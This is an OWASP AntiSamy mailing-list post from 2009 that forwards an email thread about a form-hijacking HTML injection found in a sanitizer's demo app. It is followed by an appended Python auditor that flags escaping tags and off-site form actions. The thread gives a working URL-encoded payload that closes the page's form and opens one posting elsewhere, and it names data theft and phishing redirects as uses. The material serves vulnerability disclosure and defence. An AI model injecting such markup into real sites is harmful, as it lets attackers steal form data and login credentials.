[Owasp-antisamy] New attack technique affects antisamy

Jerry Hoff jerry.hoff at aspectsecurity.com
Fri Mar 13 11:27:16 EDT 2009


While testing antisamy.net last night, I noticed some very strange behavior concerning the form tag. Formjacking anyone? Here is the ensuing conversation.



-----Original Message-----
From: Jerry Hoff
Sent: Fri 3/13/2009 10:21 AM
To: Arshan Dabirsiaghi
Cc: Jason Li
Subject: poor man's unchecked redirect

Hey guys,

Last night I noticed some of the style sheets allow the form element.  We should probably remove that.

attack string:
http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=%3C%2Fform%3E%3Cform+action%3D%22http%3A%2F%2Fwww.google.com%22%3E&policy=antisamy-myspace-1.2.xml#08027181340889056708

Now, when the user hits the "update profile" button, the user will be redirected to google.com and google steals the form data. 

Jerry




From: Jason Li
Sent: Fri 3/13/2009 10:40 AM
To: Jerry Hoff; Arshan Dabirsiaghi
Subject: RE: poor man's unchecked redirect

This isn't a stylesheet problem - it's a problem in the form tag.

It's actually interesting behavior... I wouldn't have expected the form action to fire since the Update Profile button is part of a different form.

I haven't tried this in IE, but I'm thinking Firefox doesn't correctly interpret the <form ... /> as one, empty element (i.e. it doesn't recognize the implicit </form> in that tag). As a result it swallows our form due to some browser quirk.

Incidentally, these are good conversations - but I think we should be having them on the mailing list in the future for archival purposes.

-Jason





-----Original Message-----
From: Arshan Dabirsiaghi
Sent: Fri 3/13/2009 10:58 AM
To: Jason Li; Jerry Hoff
Subject: RE: poor man's unchecked redirect

I immediately Googled with Jerry on this. It works in IE too. Definitely a cross-browser "bug" even though it smacks of intended behavior. The same behavior works with empty i, b and u tags. Self-contained tags == affect the rest of the page for some reason.
 
Jerry, why don't you fwd this to the AntiSamy list? It's a new, useful attack technique and I think we'll have to whitelist the form actions to only point to good.com to prevent this type of attack.
 
Immediately what I can see an attacker doing is:

    * use it to steal data (what if that form was a login form rather than a profile update?)
    * as Jerry points out, unchecked redirect to a phishing page

Arshan
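The thread's fix is to stop a sanitized fragment from escaping its container: the injected `</form><form action="...">` closes the page's own form, and the `<form .../>` shorthand (like empty `i`, `b` and `u` tags) leaves an element open that swallows the rest of the page. The auditor below is an added example written for this post, not AntiSamy code. It walks a sanitized fragment with Python's stdlib `html.parser` and flags an end tag that closes nothing the fragment opened, a tracked tag that is never closed, and a `form` action whose host is not on an allow list. The allow list (`good.com`, as in Arshan's message) and the set of tracked tags are assumptions; the attack string is the one from Jerry's URL, decoded.

```python
"""Audit a sanitized HTML fragment for tags that escape their container.

Added example for this thread, not part of AntiSamy. It flags three things
a policy reviewer would want to catch after sanitization:
  * an end tag that closes an element the fragment never opened,
  * a start tag that is never closed (including the <form .../> shorthand,
    which browsers do not treat as an empty element),
  * a <form action> whose host is not on the site's own allow list.
"""
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlparse

# Assumption: the site's own host(s); "good.com" is the placeholder used in the thread.
ALLOWED_FORM_HOSTS = {"good.com", "www.good.com"}

# Assumption: tags whose imbalance leaks out of the fragment (form, i, b, u per the thread).
TRACKED_TAGS = {"form", "i", "b", "u"}


class FragmentAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.open_stack = []   # tracked tags opened in this fragment, in document order
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self._check_action(dict(attrs).get("action"))
        if tag in TRACKED_TAGS:
            self.open_stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        # <form ... /> is not an empty element to the browser: count it as opened.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag not in TRACKED_TAGS:
            return
        if tag in self.open_stack:
            # Close the most recently opened matching tag.
            idx = len(self.open_stack) - 1 - self.open_stack[::-1].index(tag)
            del self.open_stack[idx]
        else:
            self.findings.append(f"stray </{tag}> closes an element outside the fragment")

    def _check_action(self, action):
        if action is None:
            return  # no action attribute: the form posts back to the page itself
        host = urlparse(action).hostname  # None for relative URLs
        if host is not None and host.lower() not in ALLOWED_FORM_HOSTS:
            self.findings.append(f"form action points off-site: {action}")

    def close(self):
        super().close()
        for tag in self.open_stack:
            self.findings.append(f"<{tag}> opened in fragment is never closed")
        self.open_stack = []


def audit_fragment(html):
    """Return the list of findings; an empty list means the fragment stays inside its container."""
    auditor = FragmentAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# The "profile" parameter from the attack URL in the thread, URL-decoded.
INJECTED_PROFILE = unquote_plus(
    "%3C%2Fform%3E%3Cform+action%3D%22http%3A%2F%2Fwww.google.com%22%3E")


if __name__ == "__main__":
    # Constructed samples: the thread's payload, a well-formed profile form, and an unclosed <i>.
    samples = (
        INJECTED_PROFILE,
        '<form action="/profile/update"><input name="bio"></form>',
        "<b>bold</b><i>",
    )
    for sample in samples:
        print(repr(sample), "->", audit_fragment(sample) or "ok")
```

Run the auditor over the sanitizer's output rather than its input: it is the post-sanitization fragment that the browser merges into the page, and a tag that AntiSamy's policy permits can still be unbalanced relative to the surrounding document. A fragment with any finding should be rejected, or its `form` elements stripped outright, before it is stored.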